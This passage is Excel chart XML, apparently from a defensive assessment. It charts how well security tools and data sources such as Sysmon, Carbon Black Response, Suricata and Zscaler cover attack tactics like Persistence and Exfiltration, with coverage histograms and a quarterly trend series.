            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000008-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="9"/>
          <c:order val="9"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$K$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Command and Control</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Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$K$2:$K$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000009-AAF6-45A1-95D9-18BC8CA8CFDC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="10"/>
          <c:order val="10"/>
          <c:tx>
            <c:strRef>
              <c:f>Trends!$L$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Initial Access</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strRef>
              <c:f>Trends!$A$2:$A$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>2018 - Q4</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Trends!$L$2:$L$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-1B30-4206-A976-F1E6A910F72E}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:smooth val="0"/>
        <c:axId val="-54239920"/>
        <c:axId val="-54235408"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="-542399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235408"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-54235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23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span"/>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EDR</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solidFill>
              <a:srgbClr val="FF4E4E"/>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'DS-Tool-Coverage-Histogram'!$A$2:$A$6</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0-20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20-40</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40-60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60-80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>80-100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Coverage-Histogram'!$B$2:$B$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>125</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-CEC6-419B-9DDE-59C8B5061739}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="41"/>
        <c:axId val="-61918832"/>
        <c:axId val="-53443568"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-61918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3443568"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-53443568"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="-61918832"/>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Sysmon</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solidFill>
              <a:srgbClr val="0070C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'DS-Tool-Coverage-Histogram'!$A$11:$A$15</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0-20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20-40</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40-60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60-80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>80-100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Coverage-Histogram'!$B$11:$B$15</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>37</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>70</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-0EF8-4E91-B81A-C0FD48DCA0D1}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="41"/>
        <c:axId val="-60972656"/>
        <c:axId val="-60968208"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-60972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0968208"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-60968208"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="-60972656"/>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AV-1</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solidFill>
              <a:srgbClr val="C0000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'DS-Tool-Coverage-Histogram'!$A$27:$A$31</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0-20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20-40</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40-60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60-80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>80-100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Coverage-Histogram'!$B$27:$B$31</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>42</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>35</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>22</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-BA7B-454D-B095-EF966317904B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="41"/>
        <c:axId val="-60918160"/>
        <c:axId val="-60904800"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-60918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0904800"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-60904800"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="-6091816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AV-2</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solidFill>
              <a:srgbClr val="92D05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'DS-Tool-Coverage-Histogram'!$A$36:$A$40</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0-20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20-40</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40-60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60-80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>80-100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Coverage-Histogram'!$B$36:$B$40</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>29</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-1560-4335-B8AF-B6438634F3BD}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="41"/>
        <c:axId val="-59396480"/>
        <c:axId val="-59281072"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-5939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9281072"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-59281072"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="0"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="-5939648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Bro</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solidFill>
              <a:srgbClr val="FFFF0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'DS-Tool-Coverage-Histogram'!$A$45:$A$49</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0-20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20-40</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40-60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60-80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>80-100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Coverage-Histogram'!$B$45:$B$49</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>140</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-0E26-4F4C-BE99-800B0FC4ADCA}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="41"/>
        <c:axId val="-59049568"/>
        <c:axId val="-59031632"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-59049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9031632"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-59031632"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="-59049568"/>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Moloch</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solidFill>
              <a:srgbClr val="D1DCFF"/>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'DS-Tool-Coverage-Histogram'!$A$54:$A$58</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0-20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20-40</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40-60</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>60-80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>80-100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Coverage-Histogram'!$B$54:$B$58</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>140</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-A84A-4B87-8B15-CF2E14CF5D4E}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="inEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="41"/>
        <c:axId val="-58892928"/>
        <c:axId val="-58888480"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-58892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8888480"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-58888480"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="-58892928"/>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800"/>
              <a:t>Tool and Data Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="0"/>
              <a:t> Coverage (Per Tactic)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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'DS-Tool-Tactic-Coverage'!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Carbon Black Response</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF4F4F">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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$B$2:$B$11</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EC5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Nessus Security Center</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="0070C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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$C$2:$C$11</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C5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Zscaler</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="00B0F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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$D$2:$D$11</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EC5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>AMP</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="C00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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$E$2:$E$11</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C5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$F$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>CyberArk</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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$F$2:$F$11</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EC5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Suricata</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFFF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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$G$2:$G$11</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EC5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:strRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$H$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>FirePOWER</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="D1DCFF">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'DS-Tool-Tactic-Coverage'!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Persistence</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Privilege Escalation</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Defense Evasion</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credential Access</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Discovery</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Lateral Movement</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Execution</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Collection</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Exfiltration</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Command and Control</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'DS-Tool-Tactic-Coverage'!$H$2:$H$11</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6-EC5A-4186-A476-F16EE1339C22}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="75"/>
        <c:axId val="-64920080"/>
        <c:axId val="-64915600"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-649200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4915600"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-649156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49200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1168398</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>150811</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>12</xdr:col>
      <xdr:colOff>365124</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>31750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12700</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>546100</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>114300</xdr:rowOff>
    </xdr:to>
